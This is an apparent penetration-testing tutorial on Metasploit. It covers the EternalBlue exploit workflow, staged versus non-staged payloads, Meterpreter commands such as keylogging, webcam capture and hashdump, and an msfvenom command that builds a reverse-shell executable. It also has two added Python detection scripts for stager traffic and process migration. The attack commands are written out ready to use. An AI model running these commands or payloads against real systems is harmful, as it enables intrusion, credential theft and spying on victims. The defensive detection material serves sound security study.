Metasploit (developed by Rapid7) unifies exploit code, payload generation, and post-exploitation into a single console. Before Metasploit, you had to compile random C code found on forums. Now, you use `msfconsole`.
The Workflow
- Search: `search eternalblue` (Find the exploit for MS17-010).
- Use: `use exploit/windows/smb/ms17_010_eternalblue`.
- Configure: `set RHOSTS 192.168.1.100` (Target IP). `set LHOST 192.168.1.5` (Your IP).
- Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`.
- Exploit: `exploit`.
- Result: `meterpreter >` session opens. You own the machine.
1. Payloads: Staged vs Non-Staged
Non-Staged (`windows/shell_reverse_tcp`):
Includes the entire shellcode in one payload. Reliable, but large (easier for Antivirus to catch).
Staged (`windows/shell/reverse_tcp`):
Sends a tiny "Stager" first. The Stager connects back and downloads the rest of the malware straight into memory. Smaller, stealthier. The name tells you which is which: an underscore (`shell_reverse_tcp`) is the single-stage payload, a slash (`shell/reverse_tcp`) is the staged one.
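The stager behaviour just described has a recognisable shape on the wire: a connection where the internal host sends almost nothing and then receives a large blob back on a port nobody would normally download from. The script below is an added example, not part of the original notes or of Metasploit itself; it runs that heuristic over constructed Zeek-style connection records (the field names follow Zeek's conn.log, the records, the port allowlist and the thresholds are all constructed assumptions to tune against your own traffic).

```python
# Added example (not from the original notes): flag the network shape of a
# staged reverse_tcp payload in constructed Zeek-style connection records.
# A staged payload makes a small outbound connection, then receives a much
# larger second stage from the listener; a non-staged payload never makes
# that follow-on download. Field names mirror Zeek's conn.log, but every
# record, port and threshold below is constructed for this example.
from dataclasses import dataclass

# Destination ports where a large server-to-client transfer is normal.
# Constructed allowlist; tune for your environment.
BENIGN_DST_PORTS = {80, 443, 22, 53, 445, 3389}


@dataclass
class Conn:
    uid: str
    orig_h: str      # internal host that opened the connection
    resp_h: str      # host it connected to
    resp_p: int      # destination port
    orig_bytes: int  # bytes sent by the originator
    resp_bytes: int  # bytes sent back by the responder


def looks_like_stager(conn, min_resp_bytes=50_000, min_ratio=100.0):
    """Return True when an outbound connection on a non-standard port sends
    almost nothing but receives a large blob: the stager connect-back shape.
    Thresholds are constructed starting points, not Metasploit constants."""
    if conn.resp_p in BENIGN_DST_PORTS:
        return False
    if conn.resp_bytes < min_resp_bytes:
        return False
    # Guard against division by zero: a stager may send zero bytes first.
    ratio = conn.resp_bytes / max(conn.orig_bytes, 1)
    return ratio >= min_ratio


def find_stager_candidates(conns):
    """Return the uids of connections matching the stager heuristic."""
    return [c.uid for c in conns if looks_like_stager(c)]


SAMPLE_CONNS = [
    # normal HTTPS browsing: well-known port, so never flagged
    Conn("C1", "10.0.0.23", "203.0.113.80", 443, 4_200, 120_000),
    # constructed stager shape: tiny request, large download on an odd port
    Conn("C2", "10.0.0.23", "203.0.113.5", 4444, 38, 180_000),
    # small chatty connection on an odd port: not enough bytes back
    Conn("C3", "10.0.0.23", "203.0.113.5", 8081, 512, 2_048),
    # large symmetric transfer on an odd port (e.g. file sync): ratio too low
    Conn("C4", "10.0.0.40", "198.51.100.9", 9000, 90_000, 95_000),
]

if __name__ == "__main__":
    print(find_stager_candidates(SAMPLE_CONNS))  # ['C2']
```

The heuristic only catches the staged variant: a non-staged payload carries everything in its first blob and produces no second-stage download, which is the same size-versus-stealth trade-off the notes describe, seen from the network side. Ratio and byte thresholds must be tuned against a baseline, since legitimate updaters and package mirrors on unusual ports produce the same asymmetry.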
2. Meterpreter (The Meta-Interpreter)
A shell (`cmd.exe`) is loud and limited.
Meterpreter is a custom DLL injected into the target's memory.
It runs entirely in RAM (Fileless malware).
Commands:
- `webcam_snap`: Takes a photo.
- `keyscan_start`: Starts keylogging.
- `hashdump`: Steals password hashes.
- `migrate`: Moves itself into `explorer.exe` so it persists if the user closes the exploited app.
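`migrate` leaves a host-side trace: to move into `explorer.exe`, the implant has to get a thread running inside that process, and Sysmon records cross-process thread creation as Event ID 8 (CreateRemoteThread) with `SourceImage`, `TargetImage`, `StartAddress` and `StartModule` fields. The script below is an added example, not part of the original notes or of Metasploit; the events it processes are constructed, and the allowlist of processes that legitimately create remote threads is an assumption to replace with your own baseline.

```python
# Added example (not from the original notes): spot the host-side trace of
# `migrate`, which moves the implant by getting a thread running in another
# process. Sysmon logs cross-process thread creation as Event ID 8
# (CreateRemoteThread). The events and the allowlist below are constructed
# for this example.

# Processes that legitimately create threads in other processes on a typical
# Windows host. Constructed allowlist: tune against your own baseline.
KNOWN_INJECTORS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\svchost.exe",
}


def is_suspicious_remote_thread(event):
    """Return a short reason string for a suspicious Event ID 8, else None."""
    if event.get("EventID") != 8:
        return None
    src = event.get("SourceImage", "").lower()
    tgt = event.get("TargetImage", "").lower()
    start_module = event.get("StartModule", "")
    if src == tgt:
        return None  # thread created in the creator's own process
    if src in KNOWN_INJECTORS:
        return None
    reasons = []
    # A thread whose start address is not backed by any loaded module is the
    # classic sign of code written into the target's memory rather than
    # loaded from disk. Sysmon leaves StartModule empty in that case; some
    # log shippers render the empty field as "-".
    if start_module in ("", "-"):
        reasons.append("start address outside any loaded module")
    if tgt.endswith("\\explorer.exe"):
        reasons.append("target is explorer.exe")
    return "; ".join(reasons) if reasons else None


def find_suspicious(events):
    """Return (source pid, target pid, reason) for each suspicious event."""
    hits = []
    for e in events:
        reason = is_suspicious_remote_thread(e)
        if reason:
            hits.append((e["SourceProcessId"], e["TargetProcessId"], reason))
    return hits


SAMPLE_EVENTS = [
    # constructed: a user application creating a thread in explorer.exe at an
    # address with no backing module, the migrate pattern
    {"EventID": 8, "SourceProcessId": 5120, "TargetProcessId": 3344,
     "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x0000020A1B4C0000", "StartModule": "-"},
    # constructed: csrss.exe creating a thread in a console app, normal
    {"EventID": 8, "SourceProcessId": 612, "TargetProcessId": 7788,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\cmd.exe",
     "StartAddress": "0x00007FFB1A2B3C4D",
     "StartModule": r"C:\Windows\System32\ntdll.dll"},
    # constructed: an unrelated event type, ignored
    {"EventID": 1, "SourceProcessId": 900, "TargetProcessId": 900,
     "SourceImage": r"C:\Windows\System32\notepad.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit)
```

The unbacked start address is the stronger of the two signals; `explorer.exe` is just the target the notes mention, and the same logic applies to any long-lived process an implant would pick. Because the implant runs only in RAM, this kind of process telemetry, not a file scan, is where the "fileless" behaviour described above actually shows up.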
3. Msfvenom
Need to create a standalone virus file?
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o virus.exe`
This creates a `.exe` that, when clicked by the victim, connects back to your Metasploit listener.